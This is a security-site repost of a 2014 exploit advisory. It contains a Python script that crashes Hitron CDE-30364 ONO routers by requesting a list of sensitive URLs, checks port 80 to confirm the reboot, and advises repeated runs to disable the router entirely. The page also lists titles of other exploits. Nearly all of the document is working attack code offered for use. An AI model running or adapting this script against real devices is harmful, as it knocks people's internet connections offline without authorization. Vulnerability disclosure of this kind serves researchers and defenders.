首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Hitron Technologies CDE-30364 Denial Of Service
来源:https://www.owasp.org 作者:Svensson 发布时间:2014-08-08  
#!/usr/bin/python

#-----------------------------------------------------------------------------------------

#Description:
#-----------------------------------------------------------------------------------------

#Hitron Technologies CDE-30364 is a famous ONO Router.

#Scanning certain sensitive urls the router is restarted. If you run the
script several times, it stops working.

import httplib
import socket
import time

print
"\n###########################################################################################################"

print "# Exploit Title: Router ONO Hitron CDE-30364 - Remote
reboot                                              #"
print "# Date:
8-10-2013
#"
print "# Exploit Author: Matias Mingorance Svensson -
matias.ms[at]owasp.org
#"
print "# Vendor Homepage:
http://www.ono.es/clientes/te-ayudamos/dudas/internet/equipos/hitron/hitron-cde-30364/
#"
print "# Tested on: Hitron Technologies
CDE-30364                                                                #"
print "# Version HW:
1A
#"
print "# Version SW:
3.1.0.8-ONO
#"
print
"###########################################################################################################\n"


host = '192.168.1.1'

#Sensitive urls
directories = ['login.asp', 'config.asp', 'reset.asp', 'css',
'css/webONO.css', 'css/ie7ONO.css', 'css/ie6ONO.css', 'js/',
'js/common.js', 'js/dict.js', 'js/hover.js', 'goform/login',
'goform/ConfigCable', 'admin/cable-Systeminfo.asp']

for directory in directories:
    conn = httplib.HTTPConnection(host)
    conn.request('GET', '/' + directory)
    r1 = conn.getresponse()
    print r1.status, r1.reason

    conn.close()

#Check 80 port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
time.sleep(4)
try:
 s.connect((host, 80))
 s.shutdown(2)
 print "\n"
 print "----------------------------------------------------------\n"
 print "Attack Fail!\n"
except:
 print "----------------------------------------------------------\n"
 print "Attack Successful! The router is rebooting!\n"
 print "Run the script several times to stop router completely!\n"

-- 
Un saludo,
Matías Mingorance Svensson
*OWASP Foundation, Open Web Application Security Project*
https://www.owasp.org
http://es.linkedin.com/in/matiasms

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Symantec Endpoint Protection 1
·SHARP MX Series - Denial of Se
·Sky Broadband Router SR101 - W
·D-Link AP 3200 Multiple Vulner
·linux/x86 Run /usr/bin/python
·SkaDate Lite 2.0 - Remote Code
·linux/x86 chmod(777 /etc/passw
·Oxwall 1.7.0 - Remote Code Exe
·Yokogawa BKBCopyD.exe Client E
·Pligg 2.0.1 - Multiple Vulnera
·Wordpress XMLRPC DoS Exploit
·MQAC.sys Arbitrary Write Privi
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved